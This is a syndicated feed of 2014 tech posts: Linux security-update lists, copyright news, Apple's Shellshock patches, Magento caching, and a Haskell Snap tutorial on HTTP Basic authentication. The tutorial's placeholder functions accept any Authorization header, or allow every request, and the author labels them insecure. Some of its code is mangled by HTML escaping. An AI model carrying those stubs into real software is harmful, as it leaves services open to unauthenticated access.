LWN.net: Tuesday’s security updates

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

CentOS has updated automake (C5:
code execution), bash (C5: command
execution), bash (C5: two vulnerabilities),
bind97 (C5: denial of service), conga (C5: multiple vulnerabilities), krb5 (C5: multiple vulnerabilities), nss (C5: signature forgery), nss, nspr (C5: multiple vulnerabilities), php (C7; C6; C5: multiple vulnerabilities), and xerces-j2 (C7; C6: unspecified vulnerability).

Fedora has updated kernel (F19:
multiple vulnerabilities).

Oracle has updated php (OL7; OL6: multiple vulnerabilities) and xerces-j2 (OL7; OL6: unspecified vulnerability).

Red Hat has updated MRG Realtime
(RHE MRG: multiple vulnerabilities), php (RHEL7; RHEL5&6: multiple vulnerabilities), and xerces-j2 (RHEL6&7: unspecified vulnerability).

Scientific Linux has updated xerces-j2 (SL6: unspecified vulnerability).

Slackware has updated bash (command execution).

SUSE has updated bash (SLE12; SUSE Manager: multiple vulnerabilities),
bash (SLE12: command execution), and mozilla-nss (SLES11 SP1, SLES10 SP3:
signature forgery).

Ubuntu has updated libvncserver
(14.04, 12.04: multiple vulnerabilities).

TorrentFreak: BitTorrent Wants to Become RIAA Certified Music Service

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

bittorrent-logoLast Friday Radiohead frontman Thom Yorke released his new solo album via BitTorrent. A few tracks were made available for free, but those who want the full album are charged $6.

The new experiment is part of BitTorrent Inc’s bundles project, which allows artists to easily share their work with fans. While many artists tested the waters before Yorke, he is the first to ask for money directly from consumers.

“If it works well it could be an effective way of handing some control of Internet commerce back to people who are creating the work. Enabling those people who make either music, video or any other kind of digital content to sell it themselves. Bypassing the self elected gate-keepers,” commented Thom Yorke on his decision to join.

Fast forward a few days and the album release has turned out to be a great success. At the time of writing the number of downloads surpassed 500,000, and at the current rate this will have doubled before the end of the week.

These numbers are for both the free sample and the full album, which are both being counted by BitTorrent. Thom Yorke doesn’t want the sales figures to become public but judging from the number of people sharing the torrent this lies well above one hundred thousand.

“When the Bundle is downloaded using one of our clients, it pings back with a torrent added event which is how these are being counted. Thom Yorke has asked that sales figures remain undisclosed, which is his discretion,” BitTorrent spokesman Christian Averill told TorrentFreak.

yorke500k

Now that BitTorrent Inc. has become a paid music service, a whole new world opens up. Will there soon be a BitTorrent release at the top of the charts for example? We asked BitTorrent whether they are considering becoming an RIAA-certified seller, and the company’s answer was an unequivocal yes.

“Our vision is absolutely that Bundles will count toward all the usual industry accolades and charts. Again, it will be up to the publisher of the specific Bundle. But the numbers certainly merit the recognition,” Averill says.

If that happens, BitTorrent sales will be eligible for RIAA’s gold and platinum awards as well as other charts.

While some music industry insiders may need some time to adjust to the idea of BitTorrent (Inc) as an authorized music service, the RIAA itself doesn’t see any reason why the company can’t apply.

“Music sales … on digital music services that are authorized by and reported to the record labels, whether paid for by the consumer through a subscription or free to the consumer through ad-supported services, are accepted for RIAA certifications,” RIAA’s Liz Kennedy tells TorrentFreak.

Becoming RIAA-certified doesn’t happen overnight though. BitTorrent would first have to request the certification and a full audit is then required to receive an Authorized service stamp and a possible listing on whymusicmatters.com.

“Whymusicmatters.com, a joint initiative of the RIAA and Music Biz, lists the leading authorized music services in the United States,” Kennedy explains.

For BitTorrent this would be a great achievement. The company has had to withstand a fair amount of criticism from copyright holders in recent years, and recognition as an authorized music service will surely silence some of it.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: Interview with openSUSE chairman Richard Brown (./themukt)

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Swapnil Bhartiya interviews
Richard Brown
, the new openSUSE chairman of the board. “The Chairman is appointed by SUSE, and by and large, my role is to be an active Board member, with the same roles and responsibilities as my colleagues on the Board. In addition I have a few additional responsibilities within SUSE, such as being a central point of contact for issues related to openSUSE, and communicating and representing the communities interests and activities within the company. I suppose it also means something more to the outside world, or else we wouldn’t be having this interview.

LWN.net: Debian may drop kFreeBSD from the Jessie release

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

The latest Debian “Bits from the release team” posting has a sharply worded
warning to the kFreeBSD developers: their work may not be a part of the
Jessie release. “We therefore advise the kFreeBSD porters that the port is in danger of
being dropped from Jessie, and invite any porters who are able to commit
to working on the port in the long term to make themselves known *now*.
The factor that gives us greatest concern is the human resources
available to the port.

Beyond Bandwidth: “Not” Neutrality?

This post was syndicated from: Beyond Bandwidth and was written by: Mark Taylor. Original post: at Beyond Bandwidth

In early May, my Internet Middleman post described how a tiny number of very large broadband network operators, mostly in the United States, are using their market power to try to extract arbitrary access charges, and in so doing, are degrading the service they sold to their paying broadband customers. They achieve this degradation by…

The post “Not” Neutrality? appeared first on Beyond Bandwidth.

___: Trolling on the The Cypherpunks Mailing List cpunks.org

This post was syndicated from: ___ and was written by: j. Original post: at ___

After leaving Fyodor’s FD, I am trolling on the
The Cypherpunks Mailing List
https://cpunks.org.

Not very bad place. For reasons unknown google doesn’t
index it anymore.

Raspberry Pi: Picademy Cymru

This post was syndicated from: Raspberry Pi and was written by: Carrie Anne Philbin. Original post: at Raspberry Pi

Road trip.

These are the two words that Clive, our Director of Education says to me on a regular basis. In fact, he has promised me a road trip to Pencoed in Wales to visit the factory where our Raspberry Pis are manufactured in the UK for some time now. Not just any road trip, but one that involves an ice cream van serving raspberry ripple ice creams (avec flake) whilst motoring across the country to Sonic Pi melodies, containing the entire Foundation crew. You would be forgiven for thinking that this is all just mere ravings of a crazy ex-teacher. But you’d be wrong.

The dream machine

The dream machine

I’m pleased to be able to announce that this dream is to become a reality! Albeit, minus the ice cream van. For one time only, we are taking Picademy, our free CPD training programme for teachers, on the road to Wales this coming November, hosted at the Sony UK Technology Centre in Pencoed, South Wales. We have 24 places on Picademy Cymru, taking place on 19th & 20th November, for practicing classroom teachers in Wales. If you fit this description then please fill out our application form here or via our Picademy page. We are looking for fun, experimental, not afraid to have a go, Welsh teachers willing to share their experiences and practices with others. Primary and secondary teachers from any subject specialism are welcome – you don’t need any computing experience, just enthusiasm and a desire to learn.

Map_of_Wales

wales

A few months ago, Dr Tom Crick, Senior Lecturer in Computing Science (and Director of Undergraduate Studies) in the Department of Computing & Information Systems at Cardiff Metropolitan University and Chair of Computing at School Wales got in touch to encourage us to run a Picademy in Wales, offering the support and encouragement we needed in order to make it happen. He says:

This is perfect timing for the first Picademy Cymru and a great opportunity for teachers, even though we still have significant uncertainty around reform of the ICT curriculum in Wales. Nevertheless, there are hundreds of teachers across Wales who have been working hard, particularly at a grassroots level with Computing At School and Technocamps, to embed more computing, programming and computational thinking skills into the existing ICT curriculum, as well as preparing for the new computer science qualifications. This will be a fantastic event and I look forward to helping out!

Join us for a tour of the factory, hands-on Raspberry Pi workshops, cross-curricular resource generation, and Welsh cakes. (If Eben and Liz don’t eat all the Welsh cakes before we get our hands on them. It’s been known to happen before.)

Велоеволюция: Предстоящо каране с Chepelare Bike&Hike и ВЕЛО Отчаяни съпруги-Чепеларе

This post was syndicated from: Велоеволюция and was written by: hap4oteka. Original post: at Велоеволюция

chepelare_velo_pohod_2 map_chepelare_pohodСледващия уикенд (3-5.10.2014)можете да се порадвате на родопската есен заедно с чепеларските вело-ентусиасти от Chepelare Bike&Hike и ВЕЛО Отчаяни съпруги
Чепеларе. Организираната от тях  байк разходка около Зеленото сърце на България – Община Чепеларе започва в петък, 3 октомври, от хижа Пашалийца над Хвойна. Маршрута е по два от ридовете на средните Родопи – античните римски пътища – източен и централен по билото на рида Радюва планина и рида Чернатица. Събота вечер се спи във вила Мечи Чал на връх Мечи Чал над Чепеларе и неделя обиколката завършва пак във Хвойна. Домакините са организирали транспорт на багажа на участниците, както и местата за спане и изхранване.
Желаещите да участват в мероприятието трябва да се запишат предварително до 30 септември на следната форма за регистрация според описаните параметри.
Записване след крайния срок ще е възможно само при наличие на свободни места за настаняване.
Повече информация и детайли https://www.facebook.com/events/830808300286277/

TorrentFreak: Labels Win Grooveshark Copyright Infringement Case

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Beleaguered music service Grooveshark is facing its biggest threat yet after a long-running case with the major labels of the RIAA came to a close last evening.

In a ruling by United States District Judge Thomas P. Griesa in the United States District Court in Manhattan, Grooveshark parent company Escape Media and two of the company’s top executives were found liable for infringing the rights of the labels on a grand scale.

The summary judgment is not a pretty read. It summarizes Grooveshark’s history and how the service began with licensed aims in mind, but achieved that by infringing the labels’ rights in the hope of reaching deals later on.

The initial problem was obtaining content to offer to users. The company solved the issue by getting employees to “seed” music to other users via its own P2P sharing software known as Sharkbyte. A 2007 email from co-founder Josh Greenberg to employees reads:

Please share as much music as possible from outside the office, and leave your computers on whenever you can. This initial content is what will help to get our network started—it’s very important that we all help out! If you have available hard drive space on your computer, I strongly encourage you to fill it with any music you can find. Download as many MP3’s as possible, and add them to the folders you’re sharing on Grooveshark. Some of us are setting up special “seed points” to house tens or even hundreds of thousands of files, but we can’t do this alone… There is no reason why ANYONE in the company should not be able to do this, and I expect everyone to have this done by Monday… IF I DON’T HAVE AN EMAIL FROM YOU IN MY INBOX BY MONDAY, YOU’RE ON MY OFFICIAL SHIT LIST.

In 2007, music obtained via Sharkbyte and other means was used to populate Grooveshark’s central music storage library. Internal company emails showed Greenberg, Tarantino and Escape’s senior programmer encouraging employees to bring in and download music so it could be uploaded to the company’s servers.

By 2008 the Grooveshark service carried more than a million tracks, including thousands uploaded by Greenberg, Tarantino and other employees. That service grew by another million tracks and eventually into the streaming service available today.

A year later the service was beginning to receive DMCA takedown notices but according to the decision handed down yesterday, the company had a solution to keep that content online.

“Escape’s senior officers searched for infringing songs that had [been] removed in response to DMCA takedown notices and re-uploaded infringing copies of those songs to Grooveshark to ensure that the music catalog remained complete,” the decision reads.

Furthermore, records show that thousands of the DMCA notices sent by the labels were forwarded internally to employees, including Greenberg and Tarantino, for the music they had personally uploaded. The fact that employees were uploading content became known to the labels following discovery in another case currently before the courts.

While the Court accepted that Escape and its employees uploaded thousands of tracks, the huge numbers claimed by the labels were rejected. In total the Court found that the defendants are liable for uploading ‘just’ 5,977 copyright works.

And, of course, there is the not insignificant number of tracks the company streamed to its users over the course of its operations. Escape’s own records show that it “streamed or publicly performed”, copies of plaintiffs’ copyrighted sound recordings at least 36 million times.

“Each time Escape streamed one of plaintiffs’ song recordings, it directly infringed upon plaintiffs’ exclusive performance rights,” the decision reads.

As a result of Greenberg and Tarantino instructing company employees to upload copyright-protected music to Grooveshark, the Court granted the labels’ motion for summary judgment on its claim for direct copyright infringement.

On the secondary infringement front the Court ruled that Escape Media is liable for the direct infringements of the employees it instructed to upload music.

“[The record labels] advance three theories of secondary liability: (1) vicarious copyright infringement, (2) inducement of copyright infringement, and (3) contributory copyright infringement. The court finds for plaintiffs on all three theories of liability,” the judgment reads.

In respect of Escape’s co-founders, Tarantino and Greenberg, the Court found that they are not only “jointly and severally liable for Escape’s direct and secondary copyright infringement” but also liable for direct infringement due to their own personal uploads of infringing content to Grooveshark.

The judgment concludes with an instruction for the parties to submit proposals on the scope of a permanent injunction against Grooveshark within 21 days. Escape Media has already announced its intention to appeal.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Apple Releases Patches for Shellshock Bug

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Apple has released updates to insulate Mac OS X systems from the dangerous “Shellshock” bug, a pervasive vulnerability that is already being exploited in active attacks.

osxPatches are available via Software Update, or from the following links for OS X Mavericks, Mountain Lion, and Lion,

After installing the updates, Mac users can check to see whether the flaw has been truly fixed by taking the following steps:

* Open Terminal, which you can find in the Applications folder (under the Utilities subfolder on Mavericks) or via Spotlight search.

* Execute this command:
bash –version

* The version after applying this update will be:

OS X Mavericks:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13)
OS X Mountain Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12)
OS X Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11)

Anchor Managed Hosting: Making Magento Shine with Varnish – Part 1

This post was syndicated from: Anchor Managed Hosting and was written by: Michael Davies. Original post: at Anchor Managed Hosting

Developing for the web can be overwhelming – the stack of technologies involved has only grown over the years, whilst customers demand faster and more responsive websites. Performance is often an afterthought, partly because it can be tricky to define. New features are tangible and easily demonstrated, but it can be difficult to make a business case for performance during the development stage. Yet as studies by Akamai, Google and Amazon have shown, the success of e-commerce sites in particular is closely linked to how they perform. Magento is a popular e-commerce framework that offers a wealth of customisation through an extensible design, though this flexibility can easily result in slow, sluggish websites if you aren’t careful. But what does it even mean for a website to be slow or perform well?

What is performance, anyway?

Often when people talk about the performance of websites, they actually mean latency. It’s no good for business if your infrastructure can handle 10,000,000 concurrent users but every page takes 5 minutes to load. The Amazon page speed study in 2007 found that there was “a 1% decrease in sales for every 0.1s increase in response times” – and the standard is only higher these days. When a customer visits your website, there are many factors involved that determine how long it takes for the page to become usable. Some of the delay is due to the time taken by the web server to prepare and send content, which is usually referred to as the server response time. Other delays can be due to slow JavaScript or CSS that block page rendering.

The best way to get started with improving performance is to measure the page load time with an independent tool such as Google PageSpeed Insights, webpagetest.org or Pingdom FPT. These give you a useful starting point and a good overview of where the most time is being taken. One of the most popular metrics used for analysing server-side performance is the “Time To First Byte” (TTFB), which as a concept has been measured for a long time. It’s important to note that this is not perfect since it can be confounded by internet latency and other such factors outside of your control. It can also be trivially artificially lowered whilst not impacting the total load time of the page.

slow_ttfb

If your Time To First Byte is bad, you might see this message on PageSpeed Insights

When it comes to Magento and page performance, it’s worth recognising that every page is different and even though you might optimise the load time of a product page, it doesn’t necessarily mean other pages will be any faster. It is worth running multiple pages through the online testing tools above, but generally there are five types of pages you want to benchmark to get an overview of how your site performs:

  • Homepage
  • Category
  • Product
  • Search Result
  • CMS, such as Help or FAQ

It is extremely common to find the homepage is snappy but the rest of the site is slow – the homepage tends to be where most of the effort is put in during development. Category pages are often slow because of the number of products they include, and thus the volume of database queries. Be careful of the temptation to have, for example, “show all products” since that is especially expensive for the server.

 

C.R.E.A.M. – Cache Rules Everything Around Magento

In an attempt to alleviate the performance problems incurred by Magento’s complex EAV  design, Varien implemented several caches built on the Zend Framework. Magento supports several different caching back-ends to be specified in the local.xml configuration. Using a cache to improve performance is not a new concept by any means. Instead of doing difficult work over and over, you simply do it once and save the result. A typical Example Caching Hierarchylarge Magento deployment might have caching at all the layers illustrated in the diagram on the right. When a client makes a request from the server, you can easily visualise the various systems it passes through, from the browser’s cache all the way to the server that eventually processes it. The general rule of thumb is that caching improves performance, and caches closer to the client reduce latency further. Despite some advanced techniques it is basically impossible to rely solely on client-side caching – at some point with dynamic sites the server must become involved.

But involving the server means a massive increase in latency. Modern high performance web servers such as nginx are rarely the bottleneck when it comes to an e-commerce site though. The slowdown comes from generating dynamic pages using a language like PHP. If a request has to hit PHP at all, this adds a lot of overhead. Parsing all the code involved in a Magento store requires orders of magnitude more CPU than serving content from a cache. Even communicating over FastCGI causes some additional latency. Opcode caches such as APC or Zend help, but only so much – they are still far too slow to use with a site that will get more than a few hundreds of requests per second. Beyond these internal PHP caches, there are many caches maintained by Magento itself. Yet these still suffer from the same problem – they don’t scale, because they still involve PHP.

 

Varnish is an “HTTP Accelerator” – it sits in front of your web application and serves content from its cache where possible. Its main appeal is that it is fast. Really fast. However not every page can, or should, be cached. The trouble with “Full Page Caching” in the truest sense of the term is that it is useless if you are personalising content per session or per user. Elements such as the shopping cart should never be cached – otherwise you risk confusingly showing others’ carts. Likewise, if a user can create an account and login, it is important not to cache that personalised page and display it for everybody. Fortunately, there is a solution which neatly utilises the flexibility and features of both Magento and Varnish.

Magento pages are constructed out of ‘blocks’, such as the header, footer, menus, cart, lists of products and so on. Although certain content such as shopping carts or personalised greetings should never be cached, the list of products is typically going to be the same regardless of user. Turpentine is a free and open-source plugin for Magento which integrates with Varnish’s “Edge Side Includes” and allows elements of pages to be cached on the block level. This can dramatically reduce server load and also improve performance, since the most expensive parts of page rendering (the list of products, menus) are cached.

Turpentine and Varnish are certainly advanced and effective tools for taking the performance of Magento to the next level, but the decision to use them should not be taken lightly. Every Magento store is different, and depending on the plugins in use you will need to test and confirm that you have excluded the necessary blocks from the block-level caching. ESI alone can only help so much, as there can still be a delay when rendering dynamic content such as shopping carts. Ideally these dynamic elements should be loaded with AJAX so that the page can be rendered as quickly as possible.

In the following posts I will give an overview of how Varnish works, and how Turpentine integrates it with Magento. I will also demonstrate with benchmarks why this sort of caching is necessary to make Magento scale and stay fast under load.

The post Making Magento Shine with Varnish – Part 1 appeared first on Anchor Managed Hosting.

SANS Internet Storm Center, InfoCON: yellow: ISC StormCast for Tuesday, September 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4169, (Tue, Sep 30th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Anchor Managed Hosting: HTTP Basic Authentication in Snap Framework

This post was syndicated from: Anchor Managed Hosting and was written by: Geoffrey Roberts. Original post: at Anchor Managed Hosting

Hi, I’m Geoffrey Roberts, one of the web developers at Anchor. I’d like to discuss something I’ve built in Haskell, and hopefully give you some ideas for other things you can do in terms of web development with the language.

I’ve been working on some web frontends in Snap Framework lately, and came to a point where I needed to know who was accessing the frontend, and whether they were allowed to use it. Seeing as the application needed to support both human-visible and RESTful interfaces, I realised that I couldn’t really use any off the shelf authentication methods.

While Snap does provide you with something out of the box to do authentication, it’s intended for human-usable interfaces only, since it’s reliant on cookie-identified sessions. Also, most of our other APIs already use some form of HTTP authentication, so it makes sense to go with an interface that people are already used to working with.

However, Snap doesn’t come with anything out of the box to handle HTTP authentication in the way it does for session-based authentication. We needed to write it ourselves.

Snaplets

Snap has a particular way of defining plugins or modules that allow certain bits of functionality to be abstracted away from the main webapp; the Snap team refers to their modular approach as Snaplets. However, given that the Haskell web space isn’t particularly well-developed, the Snap team only acknowledges the existence of about a dozen Snaplets on their website.

But here’s the rub; we don’t actually need to write a whole snaplet just to do HTTP authentication. It’s enough to write a few intermediary functions and define a couple of data types.

Data types

First, we’re going to define a data type that covers the kind of authentication that we are going to use. Let’s call it AuthHeader.

import Data.ByteString (ByteString)
data AuthHeader = BasicAuth ByteString deriving (Show, Eq)

For the time being, we’ll only support Basic HTTP authentication, but this could later be extended to support Digest and custom token-based headers too.

Writing the intermediary

The intermediary function that we’re going to write starts out like this:

withAuth :: Handler App App () -> Handler App App ()

As you can see, the type signature takes in a single action of type Handler App App (), and returns something of type Handler App App (). Essentially, the argument we’re taking is the handler that gets called when the HTTP authentication is successful. This means, that when we call our other handlers, they’d look something like this:

exampleHandler :: Handler App App ()
exampleHandler = withAuth $ do
writeBS "Hello authenticated user"

As you can see, the behaviour of the handler is nicely wrapped within withAuth.

Getting the Authorization header

Anyway, the rest of the intermediary looks a bit like this:

withAuth successful = do
rq < - getRequest
let mh = getHeader "Authorization" rq
let h = parseAuthorizationHeader mh
uok < - liftIO $ testAuthHeader h
if uok
then successful
else
case h of
Nothing -> throwChallenge
Just _ -> throwDenied

Firstly, it gets the current Request from the Snap monad, which Handler implements. We extract the Authorization header from it – note the use of let, because getHeader doesn’t operate within any of Handler‘s monads.

We then call to an external function called parseAuthorizationHeader to turn the value that could be the Authorization header into a value of type Maybe AuthHeader. We say it could be, because we can’t actually assume that the Request actually contains an Authorization header. To this end, getHeader actually returns a value of type Maybe ByteString, to allow for the possibility that the Request doesn’t have one.

parseAuthorizationHeader looks a bit like this:

parseAuthorizationHeader :: Maybe ByteString -> Maybe AuthHeader
parseAuthorizationHeader bs =
case bs of
Nothing -> Nothing
Just x ->
case (S.split ' ' x) of
("Basic" : y : _) ->
if S.length y > 0 then Just $ BasicAuth y else Nothing
_ -> Nothing

Note the use of S as prefixes for ByteString manipulation functions. Let’s make sure we add import qualified Data.ByteString.Char8 as S up the top of our module so we can support the split and length functions, and so we don’t introduce unnecessary ambiguity.

Testing the Authorization header

Going back to our intermediary function:

uok < - liftIO $ testAuthHeader h

This calls out to an action called testAuthHeader, which runs in the IO monad. We can use the IO monad within Handler, but it’s buried down there in the stack a bit, which means we need to use liftIO to get to it.

testAuthHandler, at its simplest, looks a bit like this:

testAuthHeader :: Maybe AuthHeader -> IO Bool
testAuthHeader Nothing = return False
testAuthHeader (Just h) = return True

As you can see, it expects any kind of AuthHeader value with some content in it. It’s not very secure, and it doesn’t check the provenance of this header, but at least it checks.

Since the function is of type IO Bool, we need to wrap the pure Bool value back up into a monadic one, which is what return does. The reason behind working in the IO monad is that it gives us breathing space for calling out to extend this function later on, so we can check the auth header properly against external services.

Finally, we need to do something with our uok variable – this will tell us whether we are allowed to run successful.

if uok
then successful
else
case h of
Nothing -> throwChallenge
Just _ -> throwDenied

HTTP status code handlers

We have two more actions to implement, throwChallenge and throwDenied, and both of these are Handlers. If no Authorization header was present at all, we run throwChallenge. If there was an Authorization header present, but it wasn’t valid, we run throwDenied. Both actions return a response with a particular HTTP status code, and in one case, set a special HTTP header.

throwChallenge :: Handler App App ()
throwChallenge = do
modifyResponse $ (setResponseStatus 401 "Unauthorized") . (setHeader "WWW-Authenticate" "Basic realm=my-authentication")
writeBS ""
throwDenied :: Handler App App ()
throwDenied = do
modifyResponse $ setResponseStatus 403 "Access Denied"
writeBS "Access Denied"

Note the way that setResponseStatus and setHeader are wrapped in modifyResponse. This is because modifyResponse modifies the current Response in the Snap monad, and setResponseStatus and setHeader are both pure functions that modify a Response that is passed to it as an argument. By using function composition, you can chain together Response-modifying functions and pass them to modifyResponse in one go.

Once this is done, just use writeBS to write output as a ByteString, and that’s it. That really is all you need to be able to get started with HTTP Authentication.

More than the basics, part 1: Decoding Basic Authorization headers

Once you’ve implemented the bare minimum, however, there’ll be other things you’ll want to do with it. Let’s start with the most obvious enhancement – decoding Basic Authorization headers.

If you want to extract a username and password from your Basic authorisation header, you’ll want to write something that is able to decode it. Since Basic auth headers are base64 encoded, let’s install the base64-bytestring package, and import it:

import qualified Data.ByteString.Base64 as BS64

Here’s an example of how this could work.

decodeAuthHeader :: AuthHeader -> Maybe (ByteString, ByteString)
decodeAuthHeader (BasicAuth x) =
case S.split ':' $ BS64.decodeLenient x of
(u:p:_) -> Just (u, p)
_ -> Nothing

It’s more rigorous to use Data.ByteString.Base64.decode instead of decodeLenient, but this is the simplest way to show how it will work.

Once you’ve got a decoded ByteString, you can split on the colon character, and then see if the resulting list has at least two elements. If it does, return the first two in a tuple, and wrap it in Just so we know that we have something good. For everything else, we just return a Nothing, because after all, we have nothing!

Also, note that when you’re dealing with external services, you might not even need to decode the Basic Authorization header. We’ll show you why next.

More than the basics, part 2: Authenticating against external sources

At some point you’re going to want to define a data source to call out to, and configure it at launch time somehow. Now we’re going to have to delve into Snap’s more advanced functionality!

Note: this method doesn’t really delve into Snaplet construction, but it does shed a little light on how you might be able to satisfy this one particular case.

Configuring your application to use external services

The easiest way to configure your application is to add a new parameter to your App, and populate it accordingly at launch time. You can then access the contents of this parameter within your Handlers.

First, define a new algebraic data type that will give you the information you need to connect to your external service. Let’s call it BasicAuthDataSource.

data BasicAuthDataSource = AllowEverything
| MyAuthAPI {
myAuthEndpointURL :: String,
myAuthEndpointMethod :: String
}

This type defines two data sources. One is a dummy source that just allows every request that gets handed to it, and the other is an external service that is defined by a URL and HTTP method.

Now, we need to create a value to store state for Snap. Let’s call this one BasicAuthManager, and define a function called authDataSource, so it’s easy to pull the BasicAuthDataSource out when we need it.

data BasicAuthManager =
BasicAuthManager {
authDataSource :: BasicAuthDataSource
}

Now, you need to add the BasicAuthManager to your App. Go to your Application.hs file, and look for the definition of App. Add a new parameter for your BasicAuthManager right at the end:

data App = App
{ _heist :: Snaplet (Heist App)
, _httpauth :: BasicAuthManager BasicAuthDataSource
}

Finally, go to your Site.hs file, and note how your App is composed right at the end of the function. One example of how you might define your BasicAuthManager might be as follows:

app :: SnapletInit App App
app = makeSnaplet "app" "An snaplet example application." Nothing $ do
h < - nestSnaplet "" heist $ heistInit "templates"
let authCfg = BasicAuthManager $ MyAuthAPI "https://api.example.com/get_user" "get"
addRoutes routes
return $ App h authCfg

Acquiring the BasicAuthDataSource within our handler

Now that we’ve added our BasicAuthManager to our App, let’s make use of it from our withAuth wrapper.

Remember our testAuthHeader function? Let’s rewrite that to make use of something that calls our external API.

testAuthHeader :: BasicAuthDataSource -> Maybe AuthHeader -> IO Bool
testAuthHeader _ Nothing = return False
testAuthHeader s (Just h) = do
u < - getUser s h
case u of
Nothing -> return False
Just _ -> return True

Note that we’re using a BasicAuthDataSource value, and we’re calling out to a new function getUser to check if we have a valid user. But how do we get our BasicAuthDataSource?

Let’s go back to withAuth, and modify it to pull the _httpauth out of our App‘s state.

withAuth :: Handler App App () -> Handler App App ()
withAuth successful = do
rq < - getRequest
authManager < - gets _httpauth
let mh = getHeader "Authorization" rq
let h = parseAuthorizationHeader mh
uok < - liftIO $ testAuthHeader (authDataSource authManager) h
if uok
then successful
else
case h of
Nothing -> throwChallenge
Just _ -> throwDenied

Note the appearance of gets _httpauth – this is the bit that extracts the persistent BasicAuthManager from the App. From this point, we can simply call authDataSource on it to pull out the BasicAuthDataSource, and add that to our call to testAuthHeader.

Getting a user

The final piece of the puzzle is getUser, and everything that hangs off it. Let’s start by defining that for all available BasicAuthDataSource types, and a data type called AuthUser to store the details of authenticated users.

data AuthUser = AuthUser {
authUserIdentity :: ByteString,
authUserDetails :: HashMap ByteString ByteString
} deriving (Show, Eq)
getUser :: BasicAuthDataSource -> AuthHeader -> IO (Maybe AuthUser)
getUser AllowEverything (BasicAuth _) = do
return $ Just $ AuthUser "basicAuthAllowed" Data.HashMap.empty
getUser a@(MyAuthAPI _ _) hdr = myAuthAPIGetUser a hdr

As you can see, using AllowEverything just assumes that any AuthHeader is valid, and therefore returns an arbitrary Just AuthUser. For MyAuthAPI, we have to define a function called myAuthAPIGetUser.

myAuthAPIGetUser :: BasicAuthDataSource -> AuthHeader -> IO (Maybe AuthUser)
myAuthAPIGetUser aa@(MyAuthAPI _ _) hdr =
handle handler $ do
resp < - myAuthAPIReqJSON aa hdr
determineUserFromResponse resp
where
handler :: SomeException -> IO (Maybe a)
handler x = do
Prelude.putStrLn $ show x
return Nothing
myAuthAPIGetUser _ _ = error "Not a valid auth type"

This consists of two stages:

  1. Querying the API and attempting to get a JSON response
  2. Checking to see if the JSON response translates to a valid user

Along the way, it tried to catch any Exceptions that get thrown, and returns a Nothing to indicate that we couldn’t get any users from the API.

Querying the API and attempting to get a JSON response

For this part, we’re using the wreq package, which is a tiny little HTTP client designed for user friendliness and brevity. There are many other HTTP clients available in Haskell; this is but one of them.

myAuthAPIReqJSON :: BasicAuthDataSource -> AuthHeader -> IO (Response ByteString)
myAuthAPIReqJSON (MyAuthAPI url method) hdr =
case method of
"get" -> do
getWith opts url
"post" -> do
postWith opts url (pack "")
_ -> error "Not a valid request verb"
where
opts = defaults
& header "Authorization" .~ [pack $ rqAuthHeader hdr]
& header "Accept" .~ [pack "application/json"]
rqAuthHeader (BasicAuth x) = "Basic " ++ (unpack x)
myAuthAPIReqJSON _ _ = error "Not a valid auth type"

As you can see, we’re allowing for both HTTP GET and POST methods to query our endpoint, and as you can see, we’re passing the Basic Authorization header that we got as part of our request onto the API we’re querying, without decoding it. Pretty nifty, eh? However, if you do need to use decodeAuthHeader to split your AuthHeader up into a username & password, now is the time to do it.

We’re also making sure to set our Accept header, so we can get a JSON response (if the server is obeying us). Either way, regardless of what happens, we get a Response ByteString back from the API, and we’re ready to determine if we can extract a user from it.

Checking to see if the JSON response translates to a valid user

Let’s extract a user from this API response.

For the sake of argument, let’s say that the API returns a user in the following form:

{
"_id": "12345",
"_url": "https://api.example.com/user/12345",
"identity": "alexandra.mack@example.com",
"roles": ["SystemAdministrator"]
}

We can define a temporary data type for this JSON structure that we can later translate to an AuthUser. We’ll also define an instance of the ToJSON class, as defined by the aeson package.

data MyAuthAPIUser = MyAuthAPIUser {
apiUserID :: String,
apiUserURL :: String,
apiUserIdentity :: String,
apiUserRoles :: [String]
}
instance FromJSON MyAuthAPIUser where
parseJSON (Object v) = MyAuthAPIUser < $>
v .: "_id" < >
v .: "_url" <
>
v .: "identity" < *>
v .: "roles"
parseJSON _ = error "Unexpected JSON input"

Now that we have this temporary structure, let’s implement determineUserFromResponse.

determineUserFromResponse :: Response ByteString -> IO (Maybe AuthUser)
determineUserFromResponse r = do
case decode (r ^. responseBody) :: Maybe MyAuthAPIUser of
Nothing -> return Nothing
Just u -> return $ Just $ AuthUser (pack $ apiUserIdentity u) (udList u)
where
udList u = fromList $ map ((a, b) -> (pack a, pack b)) [
("internalID", apiUserID u),
("roles", intercalate "," $ apiUserRoles u),
("url", apiUserURL u)]

We’re attempting to extract the Response‘s body and decode it to a MyAuthAPIUser in one swoop here. If we successfully decode it, we can generate an AuthUser from the contents of the MyAuthAPI user. If we fail to decode it, we can assume that the response didn’t contain a valid user at all.

And that’s it – we have everything we need to get a user from the API!

Conclusion

We’ve taken the long way around, but I hope this has been useful, at least as far as explaining how you can perform common tasks in Snap and use application state to keep track of configuration. In a future post, I might be able to elaborate on how to turn this simple example of state within Snap into a complete Snaplet.

In future months, you’ll probably start to see more web technology coming out of Anchor that is based on Haskell, and we’re looking forward to building more and more stuff based on it. Hopefully I’ll be able to explain some of it to you, and if there’s anything we can give back to the wider community, we’ll see what we can do.


Thanks to Andrew Cowie, Tran Ma, Sharif Olorin and Thomas Sutton for their proofreading and suggestions.

The post HTTP Basic Authentication in Snap Framework appeared first on Anchor Managed Hosting.

